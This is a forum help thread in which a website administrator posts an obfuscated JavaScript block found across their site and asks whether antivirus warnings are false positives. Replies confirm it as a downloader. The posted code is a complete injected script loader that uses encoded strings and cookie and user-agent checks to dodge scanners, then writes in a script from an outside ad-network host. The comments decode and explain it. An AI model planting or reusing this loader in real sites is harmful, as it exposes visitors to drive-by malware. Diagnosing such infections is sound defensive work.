JS:Includer-BHW[Trj] / Possible false positive?

Hello,

I am the site administrator/content manager for http://socialism.com

We have previously received warnings from Bing that our website contained malicious JavaScript and references to Malware networks, but since I was unable to find these specific instances, I assumed Bing was being overly cautious. Furthermore, Google has never given us such warnings:

http://www.google.com/safebrowsing/diagnostic?site=socialism.com

I have run our site through Sucuri SiteCheck, Wepawet, Zulu Risk Scanner, and VirusTotal. All but one say our site is clean or benign, with Wepawet claiming that our website may be suspicious but unable to point to anything in particular.

https://www.virustotal.com/en-gb/url/73ede2899468828ecb7bf4e43c7172780171a9d03b035e5f73d01928e3d56fe5/analysis/1417815619/

http://zulu.zscaler.com/submission/show/9c333b21a4f3b6a9531753d912caefb8-1417810824

http://wepawet.iseclab.org/view.php?hash=69eb6a6c79d3099f31a9f28e9540811c&t=1417810667&type=js#sec_deobfuscation

Today, however, one of our users received this message while trying to access our site:

http://i.imgur.com/LivZV6F.jpg

Is this a false positive?

Many (all?) of the pages on our site do contain a block of obfuscated JavaScript that I have been unable to identify.


// Obfuscated string table. Every property name and literal used by the code
// below is fetched from here by index, and each entry is hex-escaped so a
// plain-text search for "cookie", "userAgent" or "write" finds nothing.
// Decoded values (index: text):
//   0 getTime   1 setTime   2 "; expires="   3 toGMTString   4 ""
//   5 cookie    6 "="       7 "; path=/"     8 ";"           9 split
//   10 length   11 substring   12 charAt   13 " "   14 indexOf
//   15 random   16 floor
//   17 "adf_prods"  - name of the cookie used as a "already ran" gate
//   18-34 short fragments ("e", "<", "org", "js", "t", "Data", "cd", "n",
//         "src", ">", "rt", "http", "ip", "adv", "scr", "ia", "med") that are
//         concatenated at run time into a <script src="http://cdn.advertmedia.org/getData.js?..."> tag
//   35 match   36 userAgent   37 referrer   38 "=\""   39 "://"
//   40 "."     41 "/get"      42 "?"        43 "\""    44 "/"
//   45 write   46 "linked"   - value stored in the adf_prods cookie
var _0x45af = ["\x67\x65\x74\x54\x69\x6D\x65", "\x73\x65\x74\x54\x69\x6D\x65", 
"\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D", "\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67", 
"", "\x63\x6F\x6F\x6B\x69\x65", "\x3D", "\x3B\x20\x70\x61\x74\x68\x3D\x2F", "\x3B", 
"\x73\x70\x6C\x69\x74", "\x6C\x65\x6E\x67\x74\x68", "\x73\x75\x62\x73\x74\x72\x69\x6E\x67", 
"\x63\x68\x61\x72\x41\x74", "\x20", "\x69\x6E\x64\x65\x78\x4F\x66", 
"\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x61\x64\x66\x5F\x70\x72\x6F\x64\x73", 
"\x65", "\x3C", "\x6F\x72\x67", "\x6A\x73", "\x74", "\x44\x61\x74\x61", "\x63\x64", "\x6E", 
"\x73\x72\x63", "\x3E", "\x72\x74", "\x68\x74\x74\x70", "\x69\x70", "\x61\x64\x76", 
"\x73\x63\x72", "\x69\x61", "\x6D\x65\x64", "\x6D\x61\x74\x63\x68", 
"\x75\x73\x65\x72\x41\x67\x65\x6E\x74", "\x72\x65\x66\x65\x72\x72\x65\x72", "\x3D\x22", 
"\x3A\x2F\x2F", "\x2E", "\x2F\x67\x65\x74", "\x3F", "\x22", "\x2F", "\x77\x72\x69\x74\x65", 
"\x6C\x69\x6E\x6B\x65\x64"];
/**
 * Writes a cookie on the current document (the de-obfuscated form of the
 * original; every _0x45af[...] lookup has been replaced by the literal it
 * resolves to).
 *
 * @param {string} name - cookie name
 * @param {string} value - cookie value, written without any escaping
 * @param {number} days - lifetime in days; a falsy value produces a session
 *   cookie with no "expires" attribute
 */
function crCx(name, value, days) {
  var expires = "";
  if (days) {
    var until = new Date();
    // days -> milliseconds from now
    until.setTime(until.getTime() + days * 24 * 60 * 60 * 1000);
    expires = "; expires=" + until.toGMTString();
  }
  // Path "/" makes the cookie visible on every page of the site.
  document.cookie = name + "=" + value + expires + "; path=/";
}
/**
 * Reads a cookie value from document.cookie (de-obfuscated form of the
 * original; _0x45af[...] lookups replaced by the literals they resolve to).
 *
 * @param {string} name - cookie name to look for
 * @returns {string|null} value of the first "name=value" entry whose
 *   left-trimmed text starts with "name=", or null when no entry matches
 */
function rdCx(name) {
  var prefix = name + "=";
  var entries = document.cookie.split(";");
  for (var i = 0, count = entries.length; i < count; i++) {
    // Strip the leading spaces that follow each ";" separator.
    var entry = entries[i].replace(/^ +/, "");
    if (entry.indexOf(prefix) == 0) {
      return entry.substring(prefix.length, entry.length);
    }
  }
  return null;
}
// Random 0..9999 appended to the injected script URL as a cache-buster
// (Math.floor(Math.random() * 10000)).
var rdscx = Math[_0x45af[16]](Math[_0x45af[15]]() * 10000);
// Value of the "adf_prods" cookie, or null if this visitor has not been
// served the injection yet (see crCx call at the end of the block).
var crUnqz = rdCx(_0x45af[17]);
// Fragments of the injected <script> tag, pulled from the string table so
// the final URL never appears contiguously in the page source.
var vbzl = _0x45af[18];
var vbza = _0x45af[19];
var vbzv = _0x45af[20];
var vbzn = _0x45af[21];
var vbzf = _0x45af[22];
var vbzb = _0x45af[23];
var vbzh = _0x45af[24];
var vbzj = _0x45af[25];
var vbzg = _0x45af[26];
var vbzq = _0x45af[27];
var vbzz = _0x45af[28];
var vbzm = _0x45af[29];
var vbzd = _0x45af[30];
var vbzk = _0x45af[31];
var vbzs = _0x45af[32];
var vbzc = _0x45af[33];
var vbzx = _0x45af[34];
// Gate 1: only fire when the adf_prods cookie is absent, i.e. once per
// visitor per 3 days. Repeat page loads (and most scanner re-checks) see
// nothing, which is consistent with the mixed scanner results described above.
if (crUnqz == null){
// Gate 2: navigator.userAgent must match MSIE, Trident or Firefox. Scanners
// and browsers with other user agents are never served the injection.
if ((navigator[_0x45af[36]][_0x45af[35]](/MSIE/i) || navigator[_0x45af[36]][_0x45af[35]](
/Trident/i) || navigator[_0x45af[36]][_0x45af[35]](/Firefox/i))){
  // Gate 3 (intended crawler filter): "!match(Linux) || !match(Apple) || ...".
  // Because the negated matches are OR-ed, this is true unless the user agent
  // matches EVERY pattern at once, so in practice it filters nothing.
  if ((!navigator[_0x45af[36]][_0x45af[35]](/Linux/i) ||! navigator[_0x45af[36]][_0x45af[
  35]](/Apple/i) ||! navigator[_0x45af[36]][_0x45af[35]](/Chrome/i) ||! navigator[_0x45af[
  36]][_0x45af[35]](/Crawler/i) ||! navigator[_0x45af[36]][_0x45af[35]](/bot/i) ||! 
  navigator[_0x45af[36]][_0x45af[35]](/Google/i) ||! navigator[_0x45af[36]][_0x45af[35]](
  /Yahoo/i) ||! navigator[_0x45af[36]][_0x45af[35]](/Python/i))){
    // Gate 4: document.referrer check with the same always-true OR shape
    // (only a referrer matching both /cache/ and /inurl/ would be excluded).
    if ((!document[_0x45af[37]][_0x45af[35]](/cache/i) ||! document[_0x45af[37]][_0x45af[
    35]](/inurl/i))){
      // document.write(...) of a third-party script tag. With the string
      // table decoded the concatenation is:
      //   <script src="http://cdn.advertmedia.org/getData.js?NNNN"></script>
      // where NNNN is rdscx. The page therefore loads and executes whatever
      // that remote host serves at the time of the visit; the payload itself
      // is not in this file, so what it does cannot be determined from here.
      // This is a remote-script injector, not just a user-agent check.
      document[_0x45af[45]](_0x45af[4] + vbza + _0x45af[4] + vbzs + _0x45af[4] + vbzd + 
      _0x45af[4] + vbzf + _0x45af[13] + vbzg + _0x45af[38] + vbzm + _0x45af[39] + vbzh + 
      _0x45af[4] + vbzj + _0x45af[40] + vbzk + _0x45af[4] + vbzl + _0x45af[4] + vbzz + 
      _0x45af[4] + vbzx + _0x45af[4] + vbzc + _0x45af[40] + vbzv + _0x45af[41] + vbzb + 
      _0x45af[40] + vbzn + _0x45af[42] + rdscx + _0x45af[43] + vbzq + _0x45af[4] + vbza + 
      _0x45af[44] + vbzs + _0x45af[4] + vbzd + _0x45af[4] + vbzf + _0x45af[4] + vbzq + 
      _0x45af[4]);
      // Set adf_prods=linked for 3 days so the injection is not repeated.
      crCx(_0x45af[17], _0x45af[46], 3)
    }
  }
}
}
;

Is this code causing a drive-by download/Trojan? Or is it a script to determine a User Agent?

I should add that I have only been working here for about a month, and I don’t know as much as I should in terms of what was present before I took over for the person before me.

VirusTotal
https://www.virustotal.com/en/file/ba2a253e09f5e4e214ef11cfb00b392159a4315fa4c2e5161b867e657dffdcdf/analysis/

The code sample you posted is not detected:
https://www.virustotal.com/nb/file/84b45848a19e7fe0dacdd8e765ef03fbf4362e2a2e8eaa5372c29bff94c4905e/analysis/1417818258/

IP history https://www.virustotal.com/nb/ip-address/216.113.194.164/information/
As you can see, there are several domains using the same IP, and several are or have been blacklisted (click the "more" button under every list).

Detection is correct, confirmed by Norman/BlueCoat

socialism.com/[b]drupal-6.8[/b] - DLoader.ATMHU

Unmaskparasites http://www.UnmaskParasites.com/security-report/?page=www.socialism.com/drupal-6.8/